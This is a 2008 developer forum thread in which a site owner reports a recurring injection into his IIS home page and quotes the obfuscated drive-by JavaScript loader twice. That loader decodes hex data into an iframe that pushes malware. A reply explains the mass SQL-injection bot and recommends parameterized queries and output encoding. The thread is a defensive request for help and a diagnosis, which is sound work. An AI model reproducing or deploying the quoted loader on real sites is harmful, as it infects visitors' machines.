473,545 Members | 2,657 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

new type of injection? rewrite default document?

This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:

<script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
q4877d47d94d7f; } var
q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian
Jul 11 '08 #1
2 1896
It would seem you have a virus on your machine that is adding the code.

this is just a thought I don't know it it will work, but try auditing access
to the file. maybe then you can at least see what user the virus is running
under. look in your task manager for processes running

"Brian Bozarth" <br***@spaceboy interactive.com wrote in message
news:eR******** ******@TK2MSFTN GP02.phx.gbl...
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home
page. What it's doing is putting in script code at the top or bottom of
the home page... it looks something like this:

<script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function
q4877d47d929d5 () {return 16;} return
(parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
q4877d47d94d7f; } var
q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the
popup in my machine because i think i have a newer version of IE. But
some people have complained that it is installing a virus on their
machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause
of it. I don't see the issue on our dev server. It seems to be IIS on
a shared host.

Brian
Jul 13 '08 #2
Brian Bozarth wrote:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home
page. What it's doing is putting in script code at the top or bottom of
the
home page... it looks something like this:
Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum...997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data tretrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/...e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl

http://groups.google.com/groups?hl=e...tngp13.phx.gbl
SQL Server:

http://groups.google.com/group/micro...9dc1701?hl=en&
2. Use Server.HTMLEnco de when writing data to Response

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jul 13 '08 #3

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics
5
2363
sql injection
by: gdp | last post by:
hi...when guarding against sql injection attack from modified form or querystring variables is it enough to strip out just apostrophes...if the variable USERNAME is the name of a text box passed to a script is the below always safe... q1="select * from TABLENAME where username='" & trim(replace(request("USERNAME"),"'","''")) & "'" ...
ASP / Active Server Pages
4
17242
Programatically click <INPUT type=image ...> element
by: Csaba2000 | last post by:
I want to be able to programatically click on the center of an <INPUT type=image ...> element (I only care about IE 5.5+). This should work regardless of whether IE has focus. Normally you would do myDomElement.click and the mouse doesn't matter, but in the case of an input image element, what happens is the submitted url has something like...
Javascript
4
1644
SQL Injection Attacks
by: poppy | last post by:
I think a site I developed has been the victim of a sql injection attack.I know how to stop this happening in future but: Is there any way I can trace such an attack?
ASP.NET
9
2047
Protecting SQL injection attacks (text input functino)
by: Darrel | last post by:
I'm learning a bit about the SWL injection issues and want to write a shared class that I can call from anywhere in my project to 'sanitize' any incoming text from textfields before sending to the DB. Is it enough to simply escape single quotes as two single quotes? Ie, replace ' with ''? Or should I also be checking for things like...
ASP.NET
5
2331
Injection Attack
by: TCORDON | last post by:
What is the best way to protect a site against it? Does anyone have a RegEx to help validate user input? TIA!
ASP.NET
5
1604
Some assistance with MS SQL injection and PHP please
by: gene.ellis | last post by:
Hello everyone, Put simply we have recently been the victims of a malicious hacker because we were not aware of the dangers of SQL injection. Now, I am adding addition validation to my forms and also GET variables (we are using PHP). Does anyone have any good techniques for the kind of validation I should be using to avoid SQL injection? I...
PHP
16
5131
SQL Injection Prevention Quickfix.. will it work
by: Michael Kujawa | last post by:
Hi All, I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but limited time right now to redo correctly. In the interm while I am rewriting the site, will adding a few lines of code as below prevent SQL injection until I have the time to rebuild the...
ASP / Active Server Pages
2
2199
question about validation and sql injection
by: Sudhakar | last post by:
A) validating username in php as part of a registration form a user fills there desired username and this is stored in a mysql. there are certain conditions for the username. a) the username should only begin either letters or numbers, and Underscore character example = user123, 123user, u_ser123, user_123 = completely case insensitive
PHP
22
2628
SQL Injection test
by: Voodoo Jai | last post by:
I have a page the uses a form to pass a postcode to another page and I want to test it against an SQL Injection. What would be a safe (i.e NO DELETING of data ) statement to try and how would I format this to try in the form. I have limited the field to 10 chars so I know i would have to test it with a larger field because a hacker could just...
PHP
0
7496
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main...
General
0
7685
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. ...
C / C++
0
7784
tracyyun
Discussion: How does Zigbee compare with other wireless protocols in smart home applications?
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the...
General
1
5354
isladogs
Access Europe - Using VBA to create a class based on a table - Wed 1 May
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules. He will explain when you may want to use classes...
Microsoft Access / VBA
0
5071
Couldn’t get equations in html when convert word .docx file to html file in C#.
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert...
C# / C Sharp
0
3485
Trying to create a lan-to-lan vpn between two differents networks
by: TSSRALBI | last post by:
Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in...
Networking - Hardware / Configuration
0
3467
Windows Forms - .Net 8.0
by: adsilva | last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
Visual Basic .NET
1
1039
muto222
How to add payments to a PHP MySQL app.
by: muto222 | last post by:
How can i add a mobile payment intergratation into php mysql website.
PHP
0
738
bsmnconsultancy
Comprehensive Guide to Website Development in Toronto: Expert Insights from BSMN Consultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating...
General

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes
How to Post and Respond on Bytes
How to Promote and Link on Bytes
How to increase your Ranking on Bytes
Become a Recognized Expert on Bytes
Feedback Welcomed! Contact Us